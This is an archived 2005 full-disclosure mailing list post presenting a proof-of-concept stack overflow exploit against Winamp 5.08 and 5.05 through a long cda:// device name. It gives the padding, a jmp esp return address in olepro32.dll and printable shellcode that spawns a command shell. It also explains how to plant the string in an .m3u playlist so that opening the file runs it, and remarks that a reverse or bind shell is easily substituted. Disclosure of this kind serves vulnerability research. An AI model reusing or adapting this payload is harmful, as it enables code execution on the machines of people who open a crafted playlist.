lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <200501281222.j0SCMurs013117@lists.netsys.com>
Date: Fri, 28 Jan 2005 13:22:55 +0100
From: "Rojodos" <rojo2_bugtraq@...oo.es>
To: "bugtraq@...urityfocus.com" <bugtraq@...urityfocus.com>,
        "full-disclosure@...ts.netsys.com" <full-disclosure@...ts.netsys.com>,
        "vulnwatch@...nwatch.org" <vulnwatch@...nwatch.org>
Subject: Winamp Exploit (POC) 5.08 Stack Overflow


Hello :)

I�ve coded an exploit about this vulnerability, using the advisory "NSFOCUS SA2005-01 : Buffer Overflow in WinAMP in_cdda.dll CDA Device Name" as a guide. The advisory is very good, so it�s very easy to code the exploit.

This code:

cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S��

Should spawn a shell in a WinXP SP1 with Winamp 5.08, I have used as offset 0x5f20546e olepro32.dll, a "jmp esp"  (nT _)

��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S�� is the scode in "printable" chars.

I wrote the scode sometime ago, in http://foro.elhacker.net Its a very very simple scode, with hardcoded system() call (i�m a noob, sorry xD)

I have used AAAABBBBCCCC... to see how big is the buffer, and to see where the ret is overflowed (in 5.08 exactly in HIII)

In Winamp 5.05 works the same code, but the ret is "IIII", so the exploit must have another "H":

 cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHnT _IJJJ��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S��

Then, the exploit works fine in Winamp 5.05 and spawns a shell :)

I have only tested it in 5.08 and 5.05, but I think that its easy to "port" the exploit to another version.

These codes can be saved in a archive type m3u (playlist archive Winamp)

If you copy these codes in a text archive like this (Winamp 5.08):

#EXTM3U
#EXTINF:5,DJ Mike Llama - Llama Whippin' Intro
cda://AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHnT _IJJJ��3�W��.�E�c�E�m�E�d�E�.�E�e�E�x�E�e�D��wP�]�S��

(for example, i have used the "demo" archive, DJ Mike Llama and edit the PLAY LIST ENTRY)

And save as *.m3u file, if you open this (in this case, I repeat, with Winamp 5.08), a cmd shell will appear :)

It�s trivial to change the shellcode to make a bindport, reverse shell, etc..

Sorry about my bad english, I�m spanish :)            (Spain exists :D)

Greets to http://www.elhacker.net  and http://foro.elhacker.net and all the people I know, especially "her" (Isthar) :)

THE REAL ELHACKER.NET! :D

Best regards. 

Rojodos

rojo2_bugtraq@...oo.es
2005-01-28




_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ